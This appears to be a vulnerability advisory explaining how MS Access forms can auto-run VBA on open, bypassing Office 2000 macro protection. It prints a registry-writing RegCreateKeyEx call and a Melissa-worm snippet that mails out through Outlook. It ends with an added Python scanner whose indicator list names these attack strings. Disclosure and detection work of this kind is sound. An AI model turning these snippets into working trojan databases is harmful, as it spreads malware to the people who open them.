 
Microsoft Access Trojan VBA code

--[ Brief Summary:

Microsoft Access Databases are not afforded "Macro execution protection" in the
manner of Word/Excel/Powerpoint documents. Attackers can insert trojan VBA code
into MS Access documents to execute arbitrary commands on the remote machine.

--[ Foreground:

There has been a great deal of discussion about MS Jet and ODBC not affording
appropriate protection to metacharacters, and the subsequent inbound hooks from
an IIS server. (I'm terribly oversimplifying an excellent article by
rfp@wiretrip.net et al: http://www.securityfocus.com/bid/286) However, trojan
applications have created a nasty media stir in the past. With Office 2000
protection from macros, Access stands alone as unprotected. Hence this spin on
the trojan VBA issue.

--[ Background:

There has been (perhaps too much) publicity surrounding the trojan/virus
capabilities of Microsoft Office applications which enable macro execution
options.

The use of these trojans should subside now that Microsoft has implemented more
stringent security options into the Office 2000 suite. Specifically, under
Tools|Macro|Security there are three security levels: High, Medium and Low (not
recommended). The "High security" setting is the default option for Word,
Excel, and Powerpoint. This setting states that "Only signed macros from
trusted sources will be allowed to run. Unsigned macros are automatically
disabled." Bye, bye Melissa. Thanx, Microsoft.

The Office 2000 suite uses Visual Basic for Applications (VBA) as its
application-portable programming language. When a user records a macro in
Word/Excel/Powerpoint, the actions are translated into VBA code. The subsequent
VBA code sequence is then termed a macro, and afforded the protections of the
security settings listed above.

--[ Issue:

The Access application, however, uses VBA as an integral part of forms
presentation and processing, which is in turn an integral part of a stand-alone
Access application. You turn off VBA, Access is neither shiny nor happy.

An attacker can craft an MS Access database with a single form which
auto-launches. When the database is opened, the form is presented
automagically. Within the properties of the form, the "On Open" property
(default sub of Form_Open) can contain VBA code.

It looks like this:

    Double click Database
    Open Database
    Show Form
    Execute VBA code

The user simply opens the document, and the code is launched.
 
--[ What can VBA do to me?

Bad VBA code has been talked about in several threads. RFP mentions the
VBA.Interaction.Shell command which executes a command on the local system.
This is a quick and dirty payload, especially when coupled to the "regedit /s"
command which would allow an attacker to create a .reg file, and import it into
the registry.

A cleaner way becomes available, which is not available to the ODBC method. The
advapi32.dll API Reg*Ex allows direct registry IO without taking the time to
upload a .reg file. These functions can simply be defined along with the
hideous necessary constants inside the VBA code.

In addition, an attacker can follow in the footsteps of Melissa and use the
VBA.Interaction.CreateObject call to create an MS Outlook instance which sends
trojan email to every address in the addressbook. *yawn*

--[ Examples

Simply click the attached Access application to see the effect this trojan can
have on your system. =) Seriously, these examples require quite a few constant
definitions to work. If you're good enough to get all the constants figured
out, you're sharp enough to create these examples on your own. In short, I
didn't show you how to do it. ;)

Our REG*EX method simply relies on a syntactically clean call to RegCreateKeyEx
to create a registry key:

rc = RegCreateKeyEx(HKEY_CURRENT_USER, "johnny@ihackstuff.com", 0, "", _
     REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, secattr, Result, Disposition)

This line will create a key under HKEY_CURRENT_USER called
"johnny@ihackstuff.com". Groovy.

The other calls, including RegSetValueEx and RegDeleteKey do various groovy
things too.

In honor of Kwyjibo, we can use the VBA.Interaction.CreateObject method to
spread like wildfire thanks to MS Outlook:

---Snip from Melissa---
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
BreakUmOffASlice.Recipients.Add "johnny@ihackstuff.com"
BreakUmOffASlice.Subject = "Important Message From " & Application.CurrentUser
BreakUmOffASlice.Send
DasMapiName.Logoff
---snip---

Access doesn't implement the System library like MS Word does. Hence, the
System.[doregistrystuff] calls won't work here. The system calls can be
replaced with just about any API you care to 'Define' in the VBA code. Other
VBA libraries such as the Application library shown above may prove suitable
replacements.
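
For defenders, a coarse triage check built from the strings this advisory names (an added example, not part of the original advisory): it scans a file's raw bytes for them in ASCII and UTF-16LE. The weights, the threshold, the function names and the sample bytes are assumptions made for this example; module text inside a database may be stored compressed or encoded, so a low score is not a clean bill.

```python
import re

# Strings named in the advisory above. The weights and the threshold are
# assumptions made for this example, not a vetted scoring scheme.
INDICATORS = {
    "Form_Open": 1,            # default sub behind a form's "On Open" property
    "CreateObject": 1,         # VBA.Interaction.CreateObject
    "advapi32": 2,             # DLL that exports the Reg*Ex registry API
    "RegCreateKeyEx": 3,
    "RegSetValueEx": 3,
    "RegDeleteKey": 3,
    "regedit /s": 3,           # silent import of a .reg file
    "Outlook.Application": 3,  # Outlook automation object
}

def find_indicators(blob: bytes) -> dict:
    """Count case-insensitive hits per indicator, as ASCII and as UTF-16LE."""
    hits = {}
    for name in INDICATORS:
        count = 0
        for encoding in ("ascii", "utf-16-le"):
            needle = re.escape(name.encode(encoding))
            count += len(re.findall(needle, blob, re.IGNORECASE))
        if count:
            hits[name] = count
    return hits

def triage(blob: bytes, threshold: int = 4):
    """Return (score, flagged, indicator names) for one file's raw bytes."""
    hits = find_indicators(blob)
    score = sum(INDICATORS[name] for name in hits)
    return score, score >= threshold, sorted(hits)

def triage_file(path: str, threshold: int = 4):
    """Run triage() over a file on disk, e.g. a quarantined mail attachment."""
    with open(path, "rb") as handle:
        return triage(handle.read(), threshold)

# Constructed sample bytes (not real databases): an auto-run form handler,
# with and without registry API names stored as UTF-16LE.
SAMPLE_BENIGN = b"\x00\x01filler\x00Private Sub Form_Open(Cancel As Integer)\r\n"
SAMPLE_SUSPECT = SAMPLE_BENIGN + "advapi32.dll RegCreateKeyEx".encode("utf-16-le")

if __name__ == "__main__":
    for label, blob in (("benign", SAMPLE_BENIGN), ("suspect", SAMPLE_SUSPECT)):
        print(label, triage(blob))
```

A flagged file is a prompt to read its form modules in an isolated environment before anyone opens it normally; an auto-run form on its own scores below the threshold because many legitimate Access applications use one.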